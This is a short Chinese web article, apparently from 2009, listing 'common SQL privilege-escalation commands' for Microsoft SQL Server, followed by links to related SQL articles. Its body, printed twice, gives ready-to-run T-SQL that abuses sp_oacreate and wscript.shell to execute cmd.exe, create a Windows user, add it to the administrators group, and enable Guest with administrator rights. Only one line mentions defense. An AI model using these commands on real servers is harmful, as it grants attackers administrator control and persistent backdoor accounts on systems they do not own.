SQL 提权 常用命令
更新时间:2009年07月24日 00:29:34 作者:
SQL 提权 常用命令,大家可以考虑下将sqlserver的服务运行权限设置为普通用户,即可防止下面的提权。
1、连接数据库
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名
2、添加新用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3、把用户加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4、激活GUEST用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'
5、把Guest加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法,可以参考脚本之家服务器安全设置栏目。
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名
2、添加新用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3、把用户加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4、激活GUEST用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'
5、把Guest加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法,可以参考脚本之家服务器安全设置栏目。
相关文章
有时候因为一些权限问题,需要修改表的所有者,下面的方法不错2009-03-03
使用sqlserver存储过程sp_send_dbmail发送邮件配置方法(图文)
这篇文章用图文的方式介绍了使用sqlserver存储过程sp_send_dbmail发送邮件的方法,大家参考使用吧2014-01-01
最近在运行系统时需要对所有服务器上数据结构进行批量修改某个字段的自增属性改成非自增2012-05-05
SQL Server新特性SequenceNumber用法介绍
这篇文章介绍了SQL Server新特性SequenceNumber的用法,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2022-02-02
本文主要介绍了SELECT...INTO的具体用法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2023-04-04
今天在把数据库备份出去,再到另一台服务器上进行数据还原时出现,数据附加失败错误3456提示,下面来看我的解决过程2012-09-09
SQL SERVER的数据类型...2006-07-07
一些有用的sql语句整理,学习sqlserver的朋友可以参考下。一些很常用的命令。建议大家收藏下。2011-03-03
mssql存储过程表名和字段名为变量的实现方法,需要的朋友可以参考下。2011-11-11
SQL Server中判断和处理NULL值的多种方法和解决方案
在SQL Server数据库中,NULL是表示缺少数据或未知值的特殊标记,处理NULL值是SQL开发人员经常遇到的问题之一,本文将介绍SQL Server中判断和处理NULL值的不同方法,以及一些解决方案,帮助您更好地处理数据库中的NULL值情况,需要的朋友可以参考下2024-01-01
最新评论